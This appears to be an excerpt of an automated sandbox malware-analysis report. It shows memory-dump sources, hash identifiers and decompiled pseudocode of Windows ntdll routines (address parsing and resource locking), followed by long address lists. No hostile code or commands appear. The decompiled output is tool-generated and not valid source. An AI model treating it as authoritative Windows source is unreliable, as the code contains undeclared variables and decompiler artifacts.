                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0093E2FB
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00933EC4
                                                                                                                                                        • uuww, xrefs: 00917F08
                                                                                                                                                        • P&N, xrefs: 00917F1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$P&N$uuww
                                                                                                                                                        • API String ID: 3901378454-468390191
                                                                                                                                                        • Opcode ID: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                                                                                                                                                        • Instruction ID: 41e9fa84d98052e166f9121288f570dd953eeb524a931df6e2d59f36ad310da4
                                                                                                                                                        • Opcode Fuzzy Hash: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                                                                                                                                                        • Instruction Fuzzy Hash: 7441B771B8021D7ADF20DA95DC86FEBB3BCEB55700F0005A9B505E6181EA70DB86CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00920B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				void* _t108;
                                                                                                                                                        				void* _t116;
                                                                                                                                                        				char _t120;
                                                                                                                                                        				short _t121;
                                                                                                                                                        				void* _t128;
                                                                                                                                                        				intOrPtr* _t130;
                                                                                                                                                        				char _t132;
                                                                                                                                                        				short _t133;
                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                        				signed int _t156;
                                                                                                                                                        				signed int _t174;
                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                        				intOrPtr* _t179;
                                                                                                                                                        				intOrPtr _t180;
                                                                                                                                                        				void* _t183;
                                                                                                                                                        
                                                                                                                                                        				_t179 = _a4;
                                                                                                                                                        				_t141 =  *_t179;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				if(_t141 == 0) {
                                                                                                                                                        					L41:
                                                                                                                                                        					 *_a8 = _t179;
                                                                                                                                                        					_t180 = _v24;
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_t180 != 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                        					}
                                                                                                                                                        					_t174 = _v32;
                                                                                                                                                        					if(_t174 == 0) {
                                                                                                                                                        						if(_v8 == 7) {
                                                                                                                                                        							goto L43;
                                                                                                                                                        						}
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					L43:
                                                                                                                                                        					if(_v16 != 1) {
                                                                                                                                                        						if(_v16 != 2) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        						L47:
                                                                                                                                                        						if(_t174 != 0) {
                                                                                                                                                        							E008F8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                        							_t116 = 8;
                                                                                                                                                        							E008EDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_v12 > 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_t120 = E00920CFA(_v28, 0, 0xa);
                                                                                                                                                        						_t183 = _t183 + 0xc;
                                                                                                                                                        						if(_t120 > 0xff) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                        						goto L47;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 > 4) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					_t121 = E00920CFA(_v28, _t180, 0x10);
                                                                                                                                                        					_t183 = _t183 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                        					goto L47;
                                                                                                                                                        				} else {
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_t123 = _v16;
                                                                                                                                                        						if(_t123 == 0) {
                                                                                                                                                        							goto L7;
                                                                                                                                                        						}
                                                                                                                                                        						_t108 = _t123 - 1;
                                                                                                                                                        						if(_t108 != 0) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						}
                                                                                                                                                        						_t178 = _t141;
                                                                                                                                                        						if(E009206BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                        							if(E009206BA(_t135, _t178) == 0 || E00920A5B(_t136, _t178) == 0) {
                                                                                                                                                        								if(_t141 != 0x3a) {
                                                                                                                                                        									if(_t141 == 0x2e) {
                                                                                                                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										} else {
                                                                                                                                                        											_v24 = _v24 + 1;
                                                                                                                                                        											L27:
                                                                                                                                                        											_v16 = _v16 & 0x00000000;
                                                                                                                                                        											L28:
                                                                                                                                                        											if(_v28 == 0) {
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											_t177 = _v24;
                                                                                                                                                        											if(_t177 != 0) {
                                                                                                                                                        												if(_v12 > 3) {
                                                                                                                                                        													L6:
                                                                                                                                                        													return 0xc000000d;
                                                                                                                                                        												}
                                                                                                                                                        												_t132 = E00920CFA(_v28, 0, 0xa);
                                                                                                                                                        												_t183 = _t183 + 0xc;
                                                                                                                                                        												if(_t132 > 0xff) {
                                                                                                                                                        													goto L6;
                                                                                                                                                        												}
                                                                                                                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											if(_v12 > 4) {
                                                                                                                                                        												goto L6;
                                                                                                                                                        											}
                                                                                                                                                        											_t133 = E00920CFA(_v28, 0, 0x10);
                                                                                                                                                        											_t183 = _t183 + 0xc;
                                                                                                                                                        											_v20 = _v20 + 1;
                                                                                                                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                        											goto L20;
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t130 = _t179 + 1;
                                                                                                                                                        									if( *_t130 == _t141) {
                                                                                                                                                        										if(_v32 != 0) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										}
                                                                                                                                                        										_v32 = _v8 + 1;
                                                                                                                                                        										_t156 = 2;
                                                                                                                                                        										_v8 = _v8 + _t156;
                                                                                                                                                        										L34:
                                                                                                                                                        										_t179 = _t130;
                                                                                                                                                        										_v16 = _t156;
                                                                                                                                                        										goto L28;
                                                                                                                                                        									}
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									goto L27;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _v12 + 1;
                                                                                                                                                        								if(_v24 > 0) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								goto L20;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							L20:
                                                                                                                                                        							_t179 = _t179 + 1;
                                                                                                                                                        							_t141 =  *_t179;
                                                                                                                                                        							if(_t141 == 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							}
                                                                                                                                                        							continue;
                                                                                                                                                        						}
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t141 == 0x3a) {
                                                                                                                                                        							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t130 = _t179 + 1;
                                                                                                                                                        								if( *_t130 != _t141) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_v20 = _v20 + 1;
                                                                                                                                                        								_t156 = 2;
                                                                                                                                                        								_v32 = 1;
                                                                                                                                                        								_v8 = _t156;
                                                                                                                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        								goto L34;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L8:
                                                                                                                                                        						if(_v8 > 7) {
                                                                                                                                                        							goto L41;
                                                                                                                                                        						}
                                                                                                                                                        						_t142 = _t141;
                                                                                                                                                        						if(E009206BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                        							if(E009206BA(_t124, _t142) == 0 || E00920A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t128 = 1;
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								_v28 = _t179;
                                                                                                                                                        								_v16 = 1;
                                                                                                                                                        								_v12 = 1;
                                                                                                                                                        								L39:
                                                                                                                                                        								if(_v16 == _t128) {
                                                                                                                                                        									goto L20;
                                                                                                                                                        								}
                                                                                                                                                        								goto L28;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v28 = _t179;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							_v12 = 1;
                                                                                                                                                        							goto L20;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t123 = _t108 == 1;
                                                                                                                                                        				if(_t108 == 1) {
                                                                                                                                                        					goto L8;
                                                                                                                                                        				}
                                                                                                                                                        				_t128 = 1;
                                                                                                                                                        				goto L39;
                                                                                                                                                        			}

                                                                                                                                                        0x0094eb8c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb8c
                                                                                                                                                        0x00920c96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920ca2
                                                                                                                                                        0x00920cac
                                                                                                                                                        0x00920cb4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b44
                                                                                                                                                        0x00920b47
                                                                                                                                                        0x00920b49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b4f
                                                                                                                                                        0x00920b50
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b56
                                                                                                                                                        0x00920b62
                                                                                                                                                        0x00920b7c
                                                                                                                                                        0x00920bac
                                                                                                                                                        0x00920a0f
                                                                                                                                                        0x0094eaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eac4
                                                                                                                                                        0x0094eac4
                                                                                                                                                        0x00920bd0
                                                                                                                                                        0x00920bd0
                                                                                                                                                        0x00920bd4
                                                                                                                                                        0x00920bd9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bdb
                                                                                                                                                        0x00920be0
                                                                                                                                                        0x0094eb0e
                                                                                                                                                        0x00920a1a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920a1a
                                                                                                                                                        0x0094eb1a
                                                                                                                                                        0x0094eb1f
                                                                                                                                                        0x0094eb27
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb36
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb36
                                                                                                                                                        0x00920bea
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bf6
                                                                                                                                                        0x00920c00
                                                                                                                                                        0x00920c03
                                                                                                                                                        0x00920c0b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c0b
                                                                                                                                                        0x0094eaaa
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920a15
                                                                                                                                                        0x00920bb6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bc6
                                                                                                                                                        0x00920bc6
                                                                                                                                                        0x00920bcb
                                                                                                                                                        0x00920c15
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c1d
                                                                                                                                                        0x00920c20
                                                                                                                                                        0x00920c21
                                                                                                                                                        0x00920c24
                                                                                                                                                        0x00920c24
                                                                                                                                                        0x00920c26
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c26
                                                                                                                                                        0x00920bcd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920bcd
                                                                                                                                                        0x00920b89
                                                                                                                                                        0x00920b89
                                                                                                                                                        0x00920b90
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b96
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b96
                                                                                                                                                        0x00920a04
                                                                                                                                                        0x00920a04
                                                                                                                                                        0x00920b9a
                                                                                                                                                        0x00920b9a
                                                                                                                                                        0x00920b9b
                                                                                                                                                        0x00920b9f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920ba5
                                                                                                                                                        0x00920ac7
                                                                                                                                                        0x00920aca
                                                                                                                                                        0x0094eacf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eade
                                                                                                                                                        0x0094eade
                                                                                                                                                        0x0094eae3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eaf3
                                                                                                                                                        0x0094eaf6
                                                                                                                                                        0x0094eaf7
                                                                                                                                                        0x0094eafe
                                                                                                                                                        0x0094eb01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eb01
                                                                                                                                                        0x0094eacf
                                                                                                                                                        0x00920ad0
                                                                                                                                                        0x00920ad4
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920ada
                                                                                                                                                        0x00920ae6
                                                                                                                                                        0x00920c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c47
                                                                                                                                                        0x00920c49
                                                                                                                                                        0x00920c4a
                                                                                                                                                        0x00920c4e
                                                                                                                                                        0x00920c51
                                                                                                                                                        0x00920c54
                                                                                                                                                        0x00920c57
                                                                                                                                                        0x00920c5a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920c60
                                                                                                                                                        0x00920afb
                                                                                                                                                        0x00920afe
                                                                                                                                                        0x00920b02
                                                                                                                                                        0x00920b05
                                                                                                                                                        0x00920b08
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00920b08
                                                                                                                                                        0x00920ae6
                                                                                                                                                        0x00920b44
                                                                                                                                                        0x009209f8
                                                                                                                                                        0x009209f8
                                                                                                                                                        0x009209f9
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0094eaa0
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: e7518ee24c2a4bf2819fd4e7c2a167ef7b5dd7bafd6ddcd47e9d4fd54f6df8fb
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: 1DA18DB1D0032ADFDF24CF64E8456BEB7B8BBD5304F24856AD482A724BD6349A41CB51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E00920554(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int* _t49;
                                                                                                                                                        				signed int _t51;
                                                                                                                                                        				signed int _t56;
                                                                                                                                                        				signed int _t58;
                                                                                                                                                        				signed int _t61;
                                                                                                                                                        				signed int _t63;
                                                                                                                                                        				void* _t66;
                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				signed int _t70;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				signed int _t81;
                                                                                                                                                        				signed int _t84;
                                                                                                                                                        				void* _t86;
                                                                                                                                                        				signed int _t93;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                        				signed int _t107;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				signed int _t115;
                                                                                                                                                        				signed int* _t119;
                                                                                                                                                        				void* _t125;
                                                                                                                                                        				void* _t126;
                                                                                                                                                        				signed int _t128;
                                                                                                                                                        				signed int _t130;
                                                                                                                                                        				signed int _t138;
                                                                                                                                                        				signed int _t144;
                                                                                                                                                        				void* _t158;
                                                                                                                                                        				void* _t159;
                                                                                                                                                        				void* _t160;
                                                                                                                                                        
                                                                                                                                                        				_t96 = _a4;
                                                                                                                                                        				_t115 =  *(_t96 + 0x28);
                                                                                                                                                        				_push(_t138);
                                                                                                                                                        				if(_t115 < 0) {
                                                                                                                                                        					_t105 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t115 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [eax], edx");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L6:
                                                                                                                                                        					_push(_t128);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L7:
                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                        						if(_t115 >= 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t49 = _t96 + 0x1c;
                                                                                                                                                        							_t106 = 1;
                                                                                                                                                        							asm("lock xadd [edx], ecx");
                                                                                                                                                        							_t115 =  *(_t96 + 0x28);
                                                                                                                                                        							__eflags = _t115;
                                                                                                                                                        							if(_t115 < 0) {
                                                                                                                                                        								L23:
                                                                                                                                                        								_t130 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
                                                                                                                                                        									_push(_t144);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t51 = E008DF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                        									__eflags = _t51 - 0x102;
                                                                                                                                                        									if(_t51 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t106 =  *(_t144 + 4);
                                                                                                                                                        									_t126 =  *_t144;
                                                                                                                                                        									_t86 = E00924FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t126);
                                                                                                                                                        									_push(_t86);
                                                                                                                                                        									E00933F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                        									E00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                        									_t130 = _t130 + 1;
                                                                                                                                                        									_t160 = _t158 + 0x28;
                                                                                                                                                        									__eflags = _t130 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E0096217A(_t106, __eflags, _t96);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E00933F92();
                                                                                                                                                        									_t158 = _t160 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t51;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E00923915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									while(1) {
                                                                                                                                                        										L32:
                                                                                                                                                        										__eflags = _a8;
                                                                                                                                                        										if(_a8 == 0) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        										_t119 = _t96 + 0x24;
                                                                                                                                                        										_t107 = 1;
                                                                                                                                                        										asm("lock xadd [eax], ecx");
                                                                                                                                                        										_t56 =  *(_t96 + 0x28);
                                                                                                                                                        										_a4 = _t56;
                                                                                                                                                        										__eflags = _t56;
                                                                                                                                                        										if(_t56 != 0) {
                                                                                                                                                        											L40:
                                                                                                                                                        											_t128 = 0;
                                                                                                                                                        											__eflags = 0;
                                                                                                                                                        											while(1) {
                                                                                                                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        												asm("sbb esi, esi");
                                                                                                                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009c01c0;
                                                                                                                                                        												_push(_t138);
                                                                                                                                                        												_push(0);
                                                                                                                                                        												_t58 = E008DF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                        												__eflags = _t58 - 0x102;
                                                                                                                                                        												if(_t58 != 0x102) {
                                                                                                                                                        													break;
                                                                                                                                                        												}
                                                                                                                                                        												_t107 =  *(_t138 + 4);
                                                                                                                                                        												_t125 =  *_t138;
                                                                                                                                                        												_t75 = E00924FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                        												_push(_t125);
                                                                                                                                                        												_push(_t75);
                                                                                                                                                        												E00933F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                        												E00933F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                        												_t128 = _t128 + 1;
                                                                                                                                                        												_t159 = _t158 + 0x28;
                                                                                                                                                        												__eflags = _t128 - 2;
                                                                                                                                                        												if(__eflags > 0) {
                                                                                                                                                        													E0096217A(_t107, __eflags, _t96);
                                                                                                                                                        												}
                                                                                                                                                        												_push("RTL: Re-Waiting\n");
                                                                                                                                                        												_push(0);
                                                                                                                                                        												_push(0x65);
                                                                                                                                                        												E00933F92();
                                                                                                                                                        												_t158 = _t159 + 0xc;
                                                                                                                                                        											}
                                                                                                                                                        											__eflags = _t58;
                                                                                                                                                        											if(__eflags < 0) {
                                                                                                                                                        												_push(_t58);
                                                                                                                                                        												E00923915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                        												asm("int3");
                                                                                                                                                        												_t61 =  *_t107;
                                                                                                                                                        												 *_t107 = 0;
                                                                                                                                                        												__eflags = _t61;
                                                                                                                                                        												if(_t61 == 0) {
                                                                                                                                                        													L1:
                                                                                                                                                        													_t63 = E00905384(_t138 + 0x24);
                                                                                                                                                        													if(_t63 != 0) {
                                                                                                                                                        														goto L52;
                                                                                                                                                        													} else {
                                                                                                                                                        														goto L2;
                                                                                                                                                        													}
                                                                                                                                                        												} else {
                                                                                                                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                        													_push( &_a4);
                                                                                                                                                        													_push(_t61);
                                                                                                                                                        													_t70 = E008DF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                        													__eflags = _t70;
                                                                                                                                                        													if(__eflags >= 0) {
                                                                                                                                                        														goto L1;
                                                                                                                                                        													} else {
                                                                                                                                                        														_push(_t70);
                                                                                                                                                        														E00923915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                        														L52:
                                                                                                                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                        														_push( &_a4);
                                                                                                                                                        														_push(1);
                                                                                                                                                        														_t63 = E008DF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                        														__eflags = _t63;
                                                                                                                                                        														if(__eflags >= 0) {
                                                                                                                                                        															L2:
                                                                                                                                                        															return _t63;
                                                                                                                                                        														} else {
                                                                                                                                                        															_push(_t63);
                                                                                                                                                        															E00923915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                        															_push( &_a4);
                                                                                                                                                        															_push(1);
                                                                                                                                                        															_t63 = E008DF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                        															__eflags = _t63;
                                                                                                                                                        															if(__eflags >= 0) {
                                                                                                                                                        																goto L2;
                                                                                                                                                        															} else {
                                                                                                                                                        																_push(_t63);
                                                                                                                                                        																_t66 = E00923915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                        																asm("int3");
                                                                                                                                                        																while(1) {
                                                                                                                                                        																	_t110 = _t66;
                                                                                                                                                        																	__eflags = _t66 - 1;
                                                                                                                                                        																	if(_t66 != 1) {
                                                                                                                                                        																		break;
                                                                                                                                                        																	}
                                                                                                                                                        																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                        																	_t66 = _t110;
                                                                                                                                                        																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                        																	__eflags = _t66 - _t110;
                                                                                                                                                        																	if(_t66 != _t110) {
                                                                                                                                                        																		continue;
                                                                                                                                                        																	} else {
                                                                                                                                                        																		_t67 =  *[fs:0x18];
                                                                                                                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                        																		return _t67;
                                                                                                                                                        																	}
                                                                                                                                                        																	goto L59;
                                                                                                                                                        																}
                                                                                                                                                        																E00905329(_t110, _t138);
                                                                                                                                                        																_t69 = E009053A5(_t138, 1);
                                                                                                                                                        																return _t69;
                                                                                                                                                        															}
                                                                                                                                                        														}
                                                                                                                                                        													}
                                                                                                                                                        												}
                                                                                                                                                        											} else {
                                                                                                                                                        												_t56 =  *(_t96 + 0x28);
                                                                                                                                                        												goto L3;
                                                                                                                                                        											}
                                                                                                                                                        										} else {
                                                                                                                                                        											_t107 =  *_t119;
